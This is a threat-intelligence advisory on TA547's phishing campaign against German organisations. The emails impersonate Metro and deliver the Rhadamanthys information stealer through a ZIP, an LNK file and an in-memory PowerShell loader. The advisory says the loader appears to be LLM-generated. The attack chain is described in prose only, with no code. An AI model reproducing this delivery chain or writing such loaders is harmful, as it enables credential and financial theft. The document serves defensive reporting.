TA547 Shifts Tactics: Leveraging Rhadamanthys Stealer in German-Specific Campaigns

Date: April 10, 2024

CVE: Not applicable

Vulnerability Type: Information Stealer

CWE: N/A

Sources: Proofpoint

Issue Summary

TA547, a financially motivated cybercriminal group, recently initiated an email campaign targeting German organizations, deploying the Rhadamanthys malware. This marks TA547's first recorded use of [[Rhadamanthys stealer]], an advanced information stealer previously utilized by multiple threat actors. The campaign featured emails impersonating the German retail giant Metro, with malicious attachments designed to execute Rhadamanthys without writing to disk, thereby evading typical file-based detection methods.

Technical Key Findings

The attack chain involves emails with a password-protected ZIP file attachment containing an LNK file. Execution of the LNK file triggers a PowerShell script that decodes and runs the [[Rhadamanthys stealer]] directly in memory. Notably, the PowerShell script exhibited signs of being generated by a Large Language Model (LLM), indicative of TA547's potential use of advanced AI tools for crafting malware delivery mechanisms.

Vulnerable products

• Windows platforms targeted via malicious email attachments

Impact assessment

[[Rhadamanthys stealer]] is designed to steal sensitive information, including credentials and financial data. Successful deployment within organizations can lead to significant data breaches, financial loss, and reputational damage.

Patches or workaround

While the report does not specify patches, organizations are advised to enhance email filtering, educate employees on phishing, and deploy behavior-based detection mechanisms to mitigate threats posed by memory-resident malware and sophisticated delivery scripts.

Tags

#TA547 #Rhadamanthys #InformationStealer #Germany #Cybercrime #MalwareCampaign #PowerShell #AI_Malware

Proofpoint identified financially-motivated TA547 targeting German organizations with an email campaign delivering Rhadamanthys malware. This is the first time researchers observed TA547 use Rhadamanthys, an information stealer that is used by multiple cybercriminal threat actors. Additionally, the actor appeared to use a PowerShell script that researchers suspect was generated by large language model (LLM) such as ChatGPT, Gemini, CoPilot, etc. IOC provided. 🔗 https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta547-targets-german-organizations-rhadamanthys-stealer

#Rhadamanthys #TA547 #cybercrime #threatintel #IOC